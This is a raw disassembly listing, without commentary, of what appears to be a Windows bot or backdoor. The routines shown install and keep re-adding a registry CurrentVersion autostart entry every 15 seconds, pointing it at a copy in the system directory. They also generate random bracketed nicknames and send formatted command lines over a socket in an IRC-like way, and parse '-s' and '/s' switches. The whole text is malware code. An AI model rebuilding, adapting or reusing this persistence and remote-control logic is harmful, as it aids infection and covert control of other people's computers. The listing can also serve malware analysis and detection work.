; ---------------------------------------------------------------------------
loc_416BAA: ; CODE XREF: sub_416AE0+A2�j
add edx, 1
cmp edx, 0Eh
jnb short loc_416BD8
loc_416BB2: ; CODE XREF: sub_416AE0+C8�j
mov ecx, 0Dh
sub ecx, edx
add ecx, ecx
add ecx, ecx
lea esi, [ebx+edx*8+50h]
add ecx, ecx
shr ecx, 2
lea edi, [esi+8]
mov dword ptr [esi], 0
mov dword ptr [esi+4], 0
rep movsd
loc_416BD8: ; CODE XREF: sub_416AE0+D0�j
mov edx, [ebx+8]
mov esi, [ebx+0Ch]
mov ecx, [ebx+4]
mov eax, [ebx]
shld esi, edx, 3
add edx, edx
mov edi, ecx
shld ecx, eax, 3
add edx, edx
add eax, eax
add edx, edx
add eax, eax
shr edi, 1Dh
xor ebp, ebp
or edx, edi
add eax, eax
or esi, ebp
push ebx
mov [ebx+0C0h], edx
mov [ebx+0C4h], esi
mov [ebx+0C8h], eax
mov [ebx+0CCh], ecx
call sub_4143D0
add esp, 4
xor esi, esi
loc_416C25: ; CODE XREF: sub_416AE0+171�j
mov ecx, esi
not ecx
and ecx, 7
mov edx, esi
shr edx, 3
mov eax, [ebx+edx*8+10h]
mov edx, [ebx+edx*8+14h]
add ecx, ecx
add ecx, ecx
add ecx, ecx
call unknown_libname_137 ; Microsoft VisualC 2-8/net runtime
mov ecx, [esp+10h+arg_0]
mov [esi+ecx], al
add esi, 1
cmp esi, 40h
jb short loc_416C25
pop edi
pop esi
pop ebp
pop ecx
retn
sub_416AE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416C60 proc near ; CODE XREF: sub_41B7F9+A3�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
sub esp, 0Ch
push ebx
mov ebx, [esp+10h+arg_4]
mov eax, [ebx]
push ebp
mov ebp, [esp+14h+arg_0]
push esi
push edi
and eax, 7Fh
mov edi, 80h
sub edi, eax
mov esi, ecx
xor ecx, ecx
add [ebx], ebp
adc [ebx+4], ecx
mov edx, [ebx+4]
cmp edx, ecx
ja short loc_416C9B
jb short loc_416C93
mov ecx, [ebx]
cmp ecx, ebp
jnb short loc_416C9B
loc_416C93: ; CODE XREF: sub_416C60+2B�j
add dword ptr [ebx+8], 1
adc dword ptr [ebx+0Ch], 0
loc_416C9B: ; CODE XREF: sub_416C60+29�j
; sub_416C60+31�j
cmp ebp, edi
jb loc_416D3F
loc_416CA3: ; CODE XREF: sub_416C60+D9�j
push edi
lea edx, [ebx+eax+50h]
push esi
push edx
call unknown_libname_61 ; Microsoft VisualC 2-8/net runtime
add esi, edi
add esp, 0Ch
sub ebp, edi
mov [esp+1Ch+var_4], esi
mov [esp+1Ch+arg_0], ebp
mov edi, 80h
mov [esp+1Ch+var_8], 0
mov esi, 10h
lea edx, [ebx+0D0h]
loc_416CD6: ; CODE XREF: sub_416C60+BC�j
mov eax, [edx-8]
mov ecx, [edx-4]
sub edx, 8
mov ebx, eax
sub esi, 1
ror ebx, 8
and ebx, 0FF00FF00h
rol eax, 8
and eax, 0FF00FFh
or ebx, eax
mov ebp, ecx
xor eax, eax
ror ebp, 8
and ebp, 0FF00FF00h
rol ecx, 8
and ecx, 0FF00FFh
or ebp, ecx
xor ecx, ecx
or eax, ebp
or ebx, ecx
test esi, esi
mov [edx], eax
mov [edx+4], ebx
jnz short loc_416CD6
mov ebx, [esp+1Ch+arg_4]
push ebx
call sub_4143D0
mov ebp, [esp+20h+arg_0]
mov eax, [esp+20h+var_8]
mov esi, [esp+20h+var_4]
add esp, 4
cmp ebp, edi
jnb loc_416CA3
loc_416D3F: ; CODE XREF: sub_416C60+3D�j
push ebp
lea edx, [eax+ebx+50h]
push esi
push edx
call unknown_libname_61 ; Microsoft VisualC 2-8/net runtime
add esp, 0Ch
pop edi
pop esi
pop ebp
pop ebx
add esp, 0Ch
retn
sub_416C60 endp
; ---------------------------------------------------------------------------
align 10h
push ecx
push eax
call sub_416AE0
add esp, 4
pop ecx
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_416D6C(int,int,int,__int16,int,int,int,int,void *Memory,int,char)
sub_416D6C proc near ; CODE XREF: sub_416D6C+D5�p
; sub_41A9DE+67F�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = word ptr 14h
arg_14 = dword ptr 1Ch
arg_1C = dword ptr 24h
Memory = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = byte ptr 30h
arg_2B = byte ptr 33h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_28], 0
push ebx
push esi
push edi
jz short loc_416D85
mov ecx, [ebp+arg_4]
shr ecx, 18h
or cl, 1
jmp short loc_416D8B
; ---------------------------------------------------------------------------
loc_416D85: ; CODE XREF: sub_416D6C+C�j
mov cl, byte ptr [ebp+arg_4+3]
and cl, 0FEh
loc_416D8B: ; CODE XREF: sub_416D6C+17�j
movzx eax, word ptr [ebp+arg_24]
mov ebx, [ebp+Memory]
lea edx, [ebx+18h]
cmp edx, eax
ja short loc_416DA8
lea edx, [ebx+18h]
mov [ebp+arg_14], ebx
or cl, 2
mov [ebp+arg_2B], 0
jmp short loc_416DB9
; ---------------------------------------------------------------------------
loc_416DA8: ; CODE XREF: sub_416D6C+2B�j
mov dx, word ptr [ebp+arg_24]
add eax, 0FFFFFFE8h
mov [ebp+arg_14], eax
and cl, 0FDh
mov [ebp+arg_2B], 1
loc_416DB9: ; CODE XREF: sub_416D6C+3A�j
movzx eax, dx
push eax ; Size
mov byte ptr [ebp+arg_4+3], cl
mov [ebp+arg_C], dx
mov [ebp+var_4], eax
call _malloc
test eax, eax
pop ecx
mov [ebp+Memory], eax
jz loc_416E58
push 6
pop ecx
mov edi, eax
lea esi, [ebp+arg_4]
rep movsd
mov edi, [ebp+arg_14]
mov esi, [ebp+arg_1C]
push edi
add eax, 18h
push esi
push eax
call unknown_libname_61 ; Microsoft VisualC 2-8/net runtime
add esp, 0Ch
push 0
lea eax, [ebp+var_8]
push eax
push [ebp+var_4]
push [ebp+Memory]
push [ebp+arg_0]
call ds:dword_41D088 ; WriteFile
test eax, eax
jz short loc_416E4F
mov eax, [ebp+var_4]
cmp [ebp+var_8], eax
jnz short loc_416E4F
push [ebp+Memory] ; Memory
call _free
cmp [ebp+arg_2B], 0
pop ecx
jz short loc_416E4B
push 0 ; char
push [ebp+arg_24] ; int
sub ebx, edi
push ebx ; Memory
add edi, esi
push edi ; int
sub esp, 18h
push 6
pop ecx
mov edi, esp
push [ebp+arg_0] ; int
lea esi, [ebp+arg_4]
rep movsd
call sub_416D6C
add esp, 2Ch
jmp short loc_416E5A
; ---------------------------------------------------------------------------
loc_416E4B: ; CODE XREF: sub_416D6C+B8�j
mov al, 1
jmp short loc_416E5A
; ---------------------------------------------------------------------------
loc_416E4F: ; CODE XREF: sub_416D6C+A1�j
; sub_416D6C+A9�j
push [ebp+Memory] ; Memory
call _free
pop ecx
loc_416E58: ; CODE XREF: sub_416D6C+66�j
xor al, al
loc_416E5A: ; CODE XREF: sub_416D6C+DD�j
; sub_416D6C+E1�j
pop edi
pop esi
pop ebx
leave
retn
sub_416D6C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416E5F proc near ; CODE XREF: sub_416F86+154�p
; sub_417119+152�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
xor ebx, ebx
push ebx
lea eax, [ebp+var_4]
push eax
push ebx
push 0F003Fh
push ebx
push ebx
push ebx
push [ebp+arg_0]
push 80000002h
call ds:dword_41D004 ; RegCreateKeyExA
test eax, eax
jz short loc_416E94
push [ebp+var_4]
call ds:dword_41D010 ; RegCloseKey
xor al, al
loc_416E91: ; CODE XREF: sub_416E5F+68�j
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_416E94: ; CODE XREF: sub_416E5F+25�j
mov eax, [ebp+arg_8]
push esi
lea esi, [eax+1]
loc_416E9B: ; CODE XREF: sub_416E5F+41�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_416E9B
sub eax, esi
push eax
push [ebp+arg_8]
push 1
push ebx
push [ebp+arg_4]
push [ebp+var_4]
call ds:dword_41D00C ; RegSetValueExA
test eax, eax
pop esi
jz short loc_416EC9
loc_416EBC: ; CODE XREF: sub_416E5F+6C�j
push [ebp+var_4]
call ds:dword_41D010 ; RegCloseKey
mov al, bl
jmp short loc_416E91
; ---------------------------------------------------------------------------
loc_416EC9: ; CODE XREF: sub_416E5F+5B�j
mov bl, 1
jmp short loc_416EBC
sub_416E5F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_416ECD(char,int,int,void *,size_t)
sub_416ECD proc near ; CODE XREF: sub_416F86+113�p
; sub_417119+100�p ...
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push 1
push 0
push [ebp+arg_4]
push 80000002h
call ds:dword_41D02C ; RegOpenKeyExA
test eax, eax
jnz short loc_416F15
lea eax, [ebp+arg_10]
push eax
push [ebp+arg_C]
lea eax, [ebp+arg_0]
push eax
push 0
push [ebp+arg_8]
push [ebp+var_4]
call ds:dword_41D008 ; RegQueryValueExA
test eax, eax
jnz short loc_416F15
push [ebp+var_4]
call ds:dword_41D010 ; RegCloseKey
mov al, 1
leave
retn
; ---------------------------------------------------------------------------
loc_416F15: ; CODE XREF: sub_416ECD+1C�j
; sub_416ECD+39�j
push [ebp+var_4]
call ds:dword_41D010 ; RegCloseKey
push [ebp+arg_10] ; size_t
push 0 ; int
push [ebp+arg_C] ; void *
call _memset
add esp, 0Ch
xor al, al
leave
retn
sub_416ECD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416F32 proc near ; CODE XREF: sub_419477+134�p
; sub_419A9F+F2�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
xor ebx, ebx
push ebx
lea eax, [ebp+var_4]
push eax
push ebx
push 0F003Fh
push ebx
push ebx
push ebx
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_41D004 ; RegCreateKeyExA
test eax, eax
jz short loc_416F65
push [ebp+var_4]
call ds:dword_41D010 ; RegCloseKey
xor al, al
loc_416F62: ; CODE XREF: sub_416F32+4E�j
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_416F65: ; CODE XREF: sub_416F32+23�j
push [ebp+arg_8]
push [ebp+var_4]
call ds:dword_41D000 ; RegDeleteValueA
test eax, eax
jz short loc_416F82
loc_416F75: ; CODE XREF: sub_416F32+52�j
push [ebp+var_4]
call ds:dword_41D010 ; RegCloseKey
mov al, bl
jmp short loc_416F62
; ---------------------------------------------------------------------------
loc_416F82: ; CODE XREF: sub_416F32+41�j
mov bl, 1
jmp short loc_416F75
sub_416F32 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=94h
sub_416F86 proc near ; CODE XREF: .text:loc_41BF0D�p
var_114 = dword ptr -114h
Memory = dword ptr -110h
Dest = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-94h]
sub esp, 114h
mov eax, dword_423064
xor eax, ebp
mov [ebp+94h+var_4], eax
push ebx
push esi
push edi
mov edi, 100h
push edi ; unsigned int
call j_??2@YAPAXI@Z ; operator new(uint)
mov esi, eax
push edi ; unsigned int
mov [ebp+94h+Memory], esi
call j_??2@YAPAXI@Z ; operator new(uint)
push edi ; unsigned int
mov [ebp+94h+var_108], eax
call j_??2@YAPAXI@Z ; operator new(uint)
push edi ; unsigned int
mov [ebp+94h+var_114], eax
call j_??2@YAPAXI@Z ; operator new(uint)
push [ebp+94h+var_114] ; void *
mov [ebp+94h+Dest], eax
call __msize
push eax ; size_t
xor ebx, ebx
push ebx ; int
push [ebp+94h+var_114] ; void *
call _memset
push [ebp+94h+Dest] ; void *
call __msize
push eax ; size_t
push ebx ; int
push [ebp+94h+Dest] ; void *
call _memset
push edi ; size_t
lea eax, [ebp+94h+var_104]
push ebx ; int
push eax ; void *
call _memset
push esi ; void *
call __msize
add esp, 40h
push eax ; size_t
push ebx ; int
push esi ; void *
call _memset
push [ebp+94h+var_108] ; void *
call __msize
push eax ; size_t
push ebx ; int
push [ebp+94h+var_108] ; void *
call _memset
push esi ; void *
call __msize
push eax
mov ebx, offset byte_425119
call sub_4196D1
mov esi, [ebp+94h+var_108]
push esi ; void *
call __msize
push eax
mov ebx, offset byte_425061
call sub_4196D1
mov ebx, [ebp+94h+var_114]
push ebx ; void *
call __msize
add esp, 30h
dec eax
push eax
push ebx
call ds:dword_41D0F4 ; GetSystemDirectoryA
push esi
mov esi, [ebp+94h+Dest]
push ebx
push offset Format ; "%s\\%s"
push esi ; void *
call __msize
pop ecx
dec eax
push eax ; Count
push esi ; Dest
call __snprintf
mov eax, esi
add esp, 14h
lea ecx, [eax+1]
loc_41707E: ; CODE XREF: sub_416F86+FD�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41707E
sub eax, ecx
push edi ; size_t
mov [eax+esi], dl
lea eax, [ebp+94h+var_104]
push eax ; void *
push [ebp+94h+Memory] ; int
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 1 ; char
call sub_416ECD
add esp, 14h
test al, al
jz short loc_4170D1
lea eax, [ebp+94h+var_104]
mov ecx, esi
loc_4170AA: ; CODE XREF: sub_416F86+13C�j
mov dl, [ecx]
cmp dl, [eax]
jnz short loc_4170C8
test dl, dl
jz short loc_4170C4
mov dl, [ecx+1]
cmp dl, [eax+1]
jnz short loc_4170C8
inc ecx
inc ecx
inc eax
inc eax
test dl, dl
jnz short loc_4170AA
loc_4170C4: ; CODE XREF: sub_416F86+12C�j
xor eax, eax
jmp short loc_4170CD
; ---------------------------------------------------------------------------
loc_4170C8: ; CODE XREF: sub_416F86+128�j
; sub_416F86+134�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_4170CD: ; CODE XREF: sub_416F86+140�j
test eax, eax
jz short loc_4170E2
loc_4170D1: ; CODE XREF: sub_416F86+11D�j
push esi
push [ebp+94h+Memory]
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
call sub_416E5F
add esp, 0Ch
loc_4170E2: ; CODE XREF: sub_416F86+149�j
push [ebp+94h+Memory] ; Memory
call j_j__free
push [ebp+94h+var_108] ; Memory
call j_j__free
push ebx ; Memory
call j_j__free
push esi ; Memory
call j_j__free
mov ecx, [ebp+94h+var_4]
add esp, 10h
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
add ebp, 94h
leave
retn
sub_416F86 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_417119 proc near ; DATA XREF: .text:0041BF1E�o
var_504 = byte ptr -504h
var_404 = byte ptr -404h
var_403 = byte ptr -403h
var_304 = byte ptr -304h
var_303 = byte ptr -303h
var_204 = dword ptr -204h
Dest = byte ptr -104h
var_103 = byte ptr -103h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 504h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
push edi
mov esi, 0FFh
xor ebx, ebx
push esi ; size_t
lea eax, [ebp+var_204+1]
push ebx ; int
push eax ; void *
mov byte ptr [ebp+var_204], bl
call _memset
push esi ; size_t
lea eax, [ebp+var_403]
push ebx ; int
push eax ; void *
mov [ebp+var_404], bl
call _memset
push esi ; size_t
lea eax, [ebp+var_303]
push ebx ; int
push eax ; void *
mov [ebp+var_304], bl
call _memset
push esi ; size_t
lea eax, [ebp+var_103]
push ebx ; int
push eax ; void *
mov [ebp+Dest], bl
call _memset
add esp, 30h
mov edi, 100h
loc_41718E: ; CODE XREF: sub_417119+1AE�j
push edi
lea esi, [ebp+var_204]
mov ebx, offset byte_425119
call sub_4196D1
push edi
lea esi, [ebp+var_404]
mov ebx, offset byte_425061
call sub_4196D1
pop ecx
pop ecx
mov esi, 0FFh
push esi
lea eax, [ebp+var_304]
push eax
call ds:dword_41D0F4 ; GetSystemDirectoryA
lea eax, [ebp+var_404]
push eax
lea eax, [ebp+var_304]
push eax
push offset aSS_1 ; "%s\\%s"
lea eax, [ebp+Dest]
push esi ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+Dest]
add esp, 14h
lea ecx, [eax+1]
loc_4171F1: ; CODE XREF: sub_417119+DD�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4171F1
sub eax, ecx
xor ebx, ebx
mov [ebp+eax+Dest], bl
push edi ; size_t
lea eax, [ebp+var_504]
push eax ; void *
lea eax, [ebp+var_204]
push eax ; int
push offset aSoftwareMicr_1 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 1 ; char
call sub_416ECD
add esp, 14h
test al, al
jz short loc_417258
lea ecx, [ebp+var_504]
lea eax, [ebp+Dest]
loc_417231: ; CODE XREF: sub_417119+130�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_41724F
cmp dl, bl
jz short loc_41724B
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_41724F
inc eax
inc eax
inc ecx
inc ecx
cmp dl, bl
jnz short loc_417231
loc_41724B: ; CODE XREF: sub_417119+120�j
xor eax, eax
jmp short loc_417254
; ---------------------------------------------------------------------------
loc_41724F: ; CODE XREF: sub_417119+11C�j
; sub_417119+128�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_417254: ; CODE XREF: sub_417119+134�j
cmp eax, ebx
jz short loc_417273
loc_417258: ; CODE XREF: sub_417119+10A�j
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_204]
push eax
push offset aSoftwareMicr_2 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
call sub_416E5F
add esp, 0Ch
loc_417273: ; CODE XREF: sub_417119+13D�j
push edi ; size_t
lea eax, [ebp+var_304]
push ebx ; int
push eax ; void *
call _memset
push edi ; size_t
lea eax, [ebp+Dest]
push ebx ; int
push eax ; void *
call _memset
push edi ; size_t
lea eax, [ebp+var_504]
push ebx ; int
push eax ; void *
call _memset
push edi ; size_t
lea eax, [ebp+var_204]
push ebx ; int
push eax ; void *
call _memset
push edi ; size_t
lea eax, [ebp+var_404]
push ebx ; int
push eax ; void *
call _memset
add esp, 3Ch
push 3A98h
call ds:dword_41D0FC ; Sleep
jmp loc_41718E
sub_417119 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4172CC(char *Format,char Args)
sub_4172CC proc near ; CODE XREF: sub_41783D+24F�p
; sub_41783D+323�p ...
Dest = byte ptr -204h
var_203 = byte ptr -203h
var_4 = dword ptr -4
Format = dword ptr 8
Args = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 204h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push esi
mov esi, 1FFh
push esi ; size_t
lea eax, [ebp+var_203]
push 0 ; int
push eax ; void *
mov [ebp+Dest], 0
call _memset
lea eax, [ebp+Args]
push eax ; Args
push [ebp+Format] ; Format
lea eax, [ebp+Dest]
push esi ; Count
push eax ; Dest
call __vsnprintf
lea eax, [ebp+Dest]
add esp, 1Ch
lea esi, [eax+1]
loc_41731B: ; CODE XREF: sub_4172CC+54�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41731B
sub eax, esi
mov [ebp+eax+Dest], cl
lea eax, [ebp+Dest]
lea esi, [eax+1]
loc_417334: ; CODE XREF: sub_4172CC+6D�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417334
push 0
sub eax, esi
push eax
lea eax, [ebp+Dest]
push eax
push dword ptr [edi]
call ds:dword_41D228 ; send
mov ecx, [ebp+var_4]
test eax, eax
setnz al
xor ecx, ebp
pop esi
call sub_402710
leave
retn
sub_4172CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_417361(int,char,int,char *Format,char Args)
sub_417361 proc near ; CODE XREF: sub_40177B+268�p
; sub_4019F3+21A�p ...
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = byte ptr -404h
var_403 = byte ptr -403h
Dest = byte ptr -204h
var_203 = byte ptr -203h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_8 = dword ptr 10h
Format = dword ptr 14h
Args = byte ptr 18h
push ebp
mov ebp, esp
sub esp, 40Ch
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push edi
mov [ebp+var_408], eax
mov eax, [ebp+arg_8]
mov edi, 1FFh
xor ebx, ebx
push edi ; size_t
mov [ebp+var_40C], eax
lea eax, [ebp+var_203]
push ebx ; int
push eax ; void *
mov [ebp+Dest], bl
call _memset
push edi ; size_t
lea eax, [ebp+var_403]
push ebx ; int
push eax ; void *
mov [ebp+var_404], bl
call _memset
add esp, 18h
cmp [ebp+arg_4], 1
jz loc_41747D
push esi
push 0Dh ; unsigned int
call j_??2@YAPAXI@Z ; operator new(uint)
mov esi, eax
lea eax, [ebp+Args]
push eax ; Args
push [ebp+Format] ; Format
lea eax, [ebp+var_404]
push edi ; Count
push eax ; Dest
call __vsnprintf
lea eax, [ebp+var_404]
add esp, 14h
lea ecx, [eax+1]
loc_4173EE: ; CODE XREF: sub_417361+92�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_4173EE
sub eax, ecx
push esi ; void *
mov [ebp+eax+var_404], bl
call __msize
push eax
mov ebx, offset asc_425570 ; "ÅÇÜÃØÆÒ"
call sub_4196D1
lea eax, [ebp+var_404]
push eax
push [ebp+var_40C]
lea eax, [ebp+Dest]
push esi
push offset aSSS_0 ; "%s %s %s\r\n"
push edi ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+Dest]
add esp, 20h
lea ecx, [eax+1]
loc_41743B: ; CODE XREF: sub_417361+DF�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41743B
sub eax, ecx
push esi ; Memory
mov [ebp+eax+Dest], dl
call j_j__free
pop ecx
lea eax, [ebp+Dest]
lea ecx, [eax+1]
pop esi
loc_41745C: ; CODE XREF: sub_417361+100�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41745C
sub eax, ecx
push 0
push eax
lea eax, [ebp+Dest]
push eax
mov eax, [ebp+var_408]
push dword ptr [eax]
call ds:dword_41D228 ; send
loc_41747D: ; CODE XREF: sub_417361+5D�j
mov ecx, [ebp+var_4]
pop edi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_417361 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41748B proc near ; CODE XREF: sub_41802F+23B�p
; sub_41829C+39�p
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_40 = byte ptr -40h
var_3F = byte ptr -3Fh
var_3C = byte ptr -3Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 48h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push esi
push edi
xor eax, eax
mov [ebp+var_40], 0
lea edi, [ebp+var_3F]
stosw
stosb
push 0Dh
pop ecx
mov esi, offset aQwertyuiopasdf ; "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPLKJ"...
lea edi, [ebp+var_3C]
rep movsd
lea eax, [ebp+var_48]
push eax
movsb
call ds:dword_41D1EC ; GetCursorPos
call ds:dword_41D108 ; GetTickCount
mov ecx, [ebp+var_48]
mov edx, dword ptr [ebp+var_44] ; char
add ecx, edx
cmp eax, ecx
jb short loc_4174D7
add ecx, eax
jmp short loc_4174D9
; ---------------------------------------------------------------------------
loc_4174D7: ; CODE XREF: sub_41748B+46�j
sub ecx, eax
loc_4174D9: ; CODE XREF: sub_41748B+4A�j
push ecx ; Seed
call _srand
pop ecx
push 8
pop ecx
xor eax, eax
mov edi, ebx
rep stosd
push offset asc_420310 ; "["
stosw
push 22h ; Count
push ebx ; Dest
stosb
call __snprintf
mov eax, ebx
add esp, 0Ch
lea esi, [eax+1]
loc_417501: ; CODE XREF: sub_41748B+7B�j
mov cl, [eax] ; unsigned int
inc eax
test cl, cl
jnz short loc_417501
xor edi, edi
sub eax, esi
push edi
mov [eax+ebx], cl
push 4
pop ecx
lea esi, [ebp+var_40]
call sub_418E51
pop ecx
mov eax, esi
push eax
push ebx
push offset aSS_2 ; "%s%s|"
push 22h ; Count
push ebx ; Dest
call __snprintf
mov eax, ebx
add esp, 14h
lea esi, [eax+1]
loc_417535: ; CODE XREF: sub_41748B+AF�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417535
sub eax, esi
push edi
push 4
lea esi, [ebp+var_40]
mov [eax+ebx], cl
call sub_418E1F
mov eax, esi
push eax
push ebx
push offset aSS_3 ; "%s%s|"
push 22h ; Count
push ebx ; Dest
call __snprintf
mov eax, ebx
add esp, 1Ch
lea esi, [eax+1]
loc_417565: ; CODE XREF: sub_41748B+DF�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417565
sub eax, esi
mov [eax+ebx], cl
call sub_419347
test al, al
jz short loc_41759C
push ebx
push offset aSp ; "%sP|"
push 22h ; Count
push ebx ; Dest
call __snprintf
mov eax, ebx
add esp, 10h
lea esi, [eax+1]
loc_417590: ; CODE XREF: sub_41748B+10A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417590
sub eax, esi
mov [eax+ebx], cl
loc_41759C: ; CODE XREF: sub_41748B+ED�j
call sub_418DA0
mov eax, dword_42659C
cmp eax, edi
mov ecx, dword_426598
jg short loc_4175D8
jl short loc_4175B7
cmp ecx, 0Ah
jnb short loc_4175D8
loc_4175B7: ; CODE XREF: sub_41748B+125�j
push eax
push ecx
push ebx
push offset aS0I64u ; "%s0%I64u|"
push 22h ; Count
push ebx ; Dest
call __snprintf
mov eax, ebx
add esp, 18h
lea esi, [eax+1]
loc_4175CF: ; CODE XREF: sub_41748B+149�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4175CF
jmp short loc_4175F7
; ---------------------------------------------------------------------------
loc_4175D8: ; CODE XREF: sub_41748B+123�j
; sub_41748B+12A�j
push eax
push ecx
push ebx
push offset aSI64u ; "%s%I64u|"
push 22h ; Count
push ebx ; Dest
call __snprintf
mov eax, ebx
add esp, 18h
lea esi, [eax+1]
loc_4175F0: ; CODE XREF: sub_41748B+16A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4175F0
loc_4175F7: ; CODE XREF: sub_41748B+14B�j
sub eax, esi
mov byte ptr [eax+ebx], 0
xor esi, esi
cmp dword_42521C, edi
jle short loc_417644
loc_417607: ; CODE XREF: sub_41748B+1B7�j
call _rand
push 31h
pop ecx
xor edx, edx
div ecx
movsx eax, [ebp+edx+var_3C]
push eax
push ebx
push offset aSC ; "%s%c"
push 22h ; Count
push ebx ; Dest
call __snprintf
mov eax, ebx
add esp, 14h
lea edi, [eax+1]
loc_41762F: ; CODE XREF: sub_41748B+1A9�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41762F
sub eax, edi
inc esi
mov [eax+ebx], cl
cmp esi, dword_42521C
jl short loc_417607
loc_417644: ; CODE XREF: sub_41748B+17A�j
push ebx
push offset aS_4 ; "%s]"
push 22h ; Count
push ebx ; Dest
call __snprintf
mov eax, ebx
add esp, 10h
lea esi, [eax+1]
loc_41765A: ; CODE XREF: sub_41748B+1D4�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41765A
sub eax, esi
mov [eax+ebx], cl
mov ecx, [ebp+var_4]
pop edi
xor ecx, ebp
mov eax, ebx
pop esi
call sub_402710
leave
retn
sub_41748B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_417676(int,int,int,int,int,char *Str)
sub_417676 proc near ; CODE XREF: sub_41783D+6A7�p
Dest = dword ptr -820h
var_81C = dword ptr -81Ch
var_20 = byte ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
Str = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 824h
push ebx
push esi
push edi
push offset Delim ; " "
push [ebp+Str] ; Str
xor ebx, ebx
mov byte ptr [ebp+var_8], 0
mov [ebp+var_4], ebx
call _strtok
jmp short loc_4176D8
; ---------------------------------------------------------------------------
loc_41769A: ; CODE XREF: sub_417676+68�j
mov eax, [ebp+var_4]
push offset Str2 ; "-s"
push esi ; Str1
mov [ebp+eax*4+Dest], esi
call __stricmp
test eax, eax
pop ecx
pop ecx
jz short loc_4176C6
push offset aS_17 ; "/s"
push esi ; Str1
call __stricmp
test eax, eax
pop ecx
pop ecx
jnz short loc_4176CA
loc_4176C6: ; CODE XREF: sub_417676+3D�j
mov byte ptr [ebp+var_8], 1
loc_4176CA: ; CODE XREF: sub_417676+4E�j
push offset asc_4202D4 ; " "
push ebx ; Str
call _strtok
inc [ebp+var_4]
loc_4176D8: ; CODE XREF: sub_417676+22�j
mov esi, eax
cmp esi, ebx
pop ecx
pop ecx
jnz short loc_41769A
mov edi, [ebp+arg_0]
